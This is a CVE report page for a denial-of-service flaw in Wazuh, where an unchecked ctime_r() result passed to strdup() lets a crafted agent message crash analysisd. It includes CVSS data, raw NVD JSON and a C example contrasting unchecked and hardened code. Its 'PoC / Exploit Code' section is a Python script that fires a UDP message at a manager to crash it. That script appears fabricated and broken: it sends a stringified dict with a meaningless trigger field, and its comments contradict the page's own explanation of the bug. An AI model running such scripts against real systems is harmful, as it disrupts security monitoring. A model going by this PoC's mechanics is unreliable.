Security Vulnerability Report
CVE-2025-62789 CVSS 7.5 HIGH

CVE-2025-62789

Published: 2025-10-29 17:15:37
Last Modified: 2025-11-03 19:37:00

Description

Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.11.0, the fim_alert() implementation does not check whether the return value of ctime_r() is NULL before calling strdup() on it. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the Wazuh manager. An attacker who is able to craft and send an agent message to the Wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.11.0.
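The defect class here is CWE-252 (unchecked return value) leading to CWE-476 (NULL pointer dereference): ctime_r() may return NULL, and strdup(NULL) then crashes the process. The following C example is added for illustration and is not Wazuh's fim_alert() code (which is not reproduced on this page). It shows the unchecked pattern next to the hardened one. The time_formatter function pointer and the always_fail_formatter stub are assumptions made so the failure path can be exercised deterministically regardless of which libc is in use.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define CTIME_BUF_LEN 26   /* POSIX: ctime_r() needs a buffer of at least 26 bytes */

/* Formatter signature matching ctime_r(). Taking it as a parameter is an
   assumption for this example: it lets the NULL path be tested without
   relying on a specific time_t value that a given libc cannot convert. */
typedef char *(*time_formatter)(const time_t *, char *);

/* Unchecked pattern (the class of bug described for fim_alert() before 4.11.0):
   the formatter's result goes straight into strdup(). If the formatter fails
   and returns NULL, strdup(NULL) dereferences a null pointer and the process
   dies. Shown for contrast only; it is never called with a failing formatter. */
char *unchecked_time_copy(time_t t, time_formatter fmt) {
    char buf[CTIME_BUF_LEN];
    return strdup(fmt(&t, buf));   /* crashes if fmt returned NULL */
}

/* Hardened pattern: test the return value before using it. On failure the
   caller receives NULL (with errno left as the formatter set it) and can log
   the event as malformed instead of bringing the daemon down. */
char *checked_time_copy(time_t t, time_formatter fmt) {
    char buf[CTIME_BUF_LEN];
    if (fmt(&t, buf) == NULL)
        return NULL;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n')   /* ctime_r() output ends with "\n" */
        buf[n - 1] = '\0';
    return strdup(buf);
}

/* Constructed stub that always fails, standing in for whatever condition makes
   ctime_r() return NULL (e.g. a time_t the libc cannot convert to a year). */
char *always_fail_formatter(const time_t *t, char *buf) {
    (void)t;
    (void)buf;
    return NULL;
}

/* Returns 1 when the hardened helper behaves correctly on both paths:
   a real timestamp yields a 24-character string with no newline, and a
   failing formatter yields NULL rather than a crash. */
int self_check(void) {
    char *s = checked_time_copy((time_t)0, ctime_r);
    int ok = s != NULL && strlen(s) == 24 && strchr(s, '\n') == NULL;
    free(s);
    return ok && checked_time_copy((time_t)0, always_fail_formatter) == NULL;
}

int main(void) {
    char *good = checked_time_copy(time(NULL), ctime_r);
    printf("checked, real ctime_r  : %s\n", good ? good : "(null)");
    free(good);

    char *bad = checked_time_copy(time(NULL), always_fail_formatter);
    printf("checked, failing fmt   : %s\n", bad ? bad : "NULL returned, no crash");
    free(bad);   /* free(NULL) is a no-op */

    /* unchecked_time_copy(time(NULL), always_fail_formatter); would crash here */
    printf("self_check             : %s\n", self_check() ? "pass" : "fail");
    return 0;
}
```

Note that most libc implementations make ctime_r() fail for out-of-range time values rather than for any filesystem condition, so the check belongs in the code that formats untrusted timestamps, not in the agent protocol layer.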

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* - VULNERABLE
Wazuh < 4.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-62789 PoC - Wazuh fim_alert() NULL pointer dereference
# This PoC demonstrates sending a crafted FIM message that can trigger the vulnerability

import socket
import time


def build_crafted_fim_event():
    """Build a specially crafted FIM event that triggers ctime_r to return NULL"""
    # This is a simplified representation of the attack concept
    # The actual exploitation requires specific filesystem conditions
    # where ctime_r returns NULL
    event = {
        'type': 'file_integrity_check',
        'path': '/tmp/malicious_file',
        'timestamp': int(time.time()),
        'mode': 'scheduled',
        'trigger_condition': 'craft_ctime_null',
    }
    return event


def send_to_manager(target_ip, target_port, event):
    """Send crafted FIM event to Wazuh manager"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # Wazuh agents communicate on UDP port 1514 by default
        message = str(event).encode('utf-8')
        sock.sendto(message, (target_ip, target_port))
        sock.close()
        print(f"[+] Crafted message sent to {target_ip}:{target_port}")
        print("[*] If ctime_r returns NULL in fim_alert(), analysisd will crash")
    except Exception as e:
        print(f"[-] Error: {e}")


def main():
    target_ip = "192.168.1.100"  # Wazuh Manager IP
    target_port = 1514           # Wazuh Agent/Mgr communication port
    print("=" * 60)
    print("CVE-2025-62789 PoC - Wazuh fim_alert() DoS")
    print("=" * 60)
    event = build_crafted_fim_event()
    send_to_manager(target_ip, target_port, event)
    print("\n[*] Note: Actual exploitation requires specific conditions")
    print("[*] where ctime_r() returns NULL before strdup() is called")


if __name__ == "__main__":
    main()
```

References

https://github.com/wazuh/wazuh/security/advisories/GHSA-8rvq-mm2f-8q22 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62789", "sourceIdentifier": "[email protected]", "published": "2025-10-29T17:15:36.823", "lastModified": "2025-11-03T19:36:59.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.11.0, fim_alert() implementation does not check whether the return value of ctime_r is NULL or not before calling strdup() on it. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.11.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.11.0", "matchCriteriaId": "7EBF4F2E-C12A-401D-8408-287D9EC5B0B1"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-8rvq-mm2f-8q22", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}